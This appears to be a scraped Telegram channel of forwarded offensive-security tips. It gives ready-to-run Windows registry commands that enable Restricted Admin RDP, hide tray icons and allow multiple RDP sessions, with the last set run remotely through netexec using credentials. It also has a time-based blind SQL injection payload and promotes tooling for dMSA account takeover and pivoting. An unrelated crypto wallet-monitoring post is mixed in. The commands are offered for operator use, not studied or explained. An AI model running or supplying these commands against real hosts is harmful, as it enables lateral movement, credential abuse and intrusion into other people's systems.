hackalls
147 subscribers
73 photos
6 files
31 links
Download Telegram
Forwarded from Dword (Secdat9xx)
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 1N73LL1G3NC3
Forwarded from Caster
Релиз моей статьи о пивотинге с использованием TailScale

Caster - Bipolar Disorder

Genre: Offensive, Experimental
Label: exploit.org
Release Date: 15 November 2024

Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov, Anastasia Graves
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
Cover Edit: Caster

https://blog.exploit.org/caster-bipolar-disorder
👍1
Forwarded from Dword
Disable

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /t REG_DWORD /v DisableRestrictedAdmin /d 0 /f
Forwarded from ⏤͟͟͞͞REHAN™ [🇮🇳]
Forwarded from Proxy Bar
🧐
/‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/ → No delay
Forwarded from Dword
➤ Hide icon (System Tray)

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayItemsDisplay /t REG_DWORD /d 1 /f

taskkill /f /im explorer.exe & start explorer.exe
Forwarded from X4r3ve
Search for computers that allow multiple RDP sessions. By default, Windows Server versions have the fSingleSessionPerUser value set to 0, allowing multiple users to log into the server via RDP. On workstations like Windows 10/11, the fSingleSessionPerUser value is set to 1, meaning only one user can log in via RDP at a time.
netexec smb ips_445.txt -u user -p passw0rd -x 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser'
1👍1
Forwarded from X4r3ve
Enables workstations to accept multiple RDP sessions. Running this will cause the RDP service to restart, interrupting established RDP connections.
netexec smb ips_445.txt -u user -p passw0rd -x 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f && sc.exe stop TermService && sc.exe start TermService'
👍1
Forwarded from 1N73LL1G3NC3
🐶 vCenterHound

Collect infrastructure and permissions data from vCenter and export it as a BloodHound‑compatible graph using Custom Nodes/Edges
Please open Telegram to view this post
VIEW IN TELEGRAM
🟥 Hyperliquid 实时监控(持续)
—— 将「内幕地址」的 充值 / 提现 / 开仓 / 平仓 / 杠杆调整 同步到 Channel

🎯 监控目标
• 充值、提现、开/平仓、杠杆调整
• 触发即推送,附带交易方向、币对、金额、杠杆、仓位价值、Tx 链接

📏 触发规则
🆕 空白地址(首次出现)
💰 大额入款(≥ 10,000,000 USDT)
⚙️ 高杠杆(≥ 10×)
📦 大仓位合约操作

🛰️ 备注
• 0xb317d2bc2d3d2df5fa441b5bae0ab9d8b07283ae 在 2025/10/15 02:02:56 获利了结并提款。但依旧持续监控
Forwarded from -
📄 The (Near) Return of the King: Account Takeover Using the BadSuccessor Technique

After Microsoft patched Yuval Gordon’s BadSuccessor privilege escalation technique, BadSuccessor returned with another blog from Yuval, briefly mentioning to the community that attackers can still abuse dMSAs to take over any object where we have a write primitive. This mention did not gather significant attention from the community, leaving an operational gap for dMSA related tooling and attention. This blog dives into why dMSA abuse is still a problem, the release of a new Beacon object file (BOF) labeled BadTakeover, plus additions to SharpSuccessor, all to show that BadSuccessor’s impact as a technique (not a vulnerability) will still hold a lasting effect. 

🔗 BadTakeover-BOF

Beacon Object File (BOF) for Using the BadSuccessor Technique for Account Takeover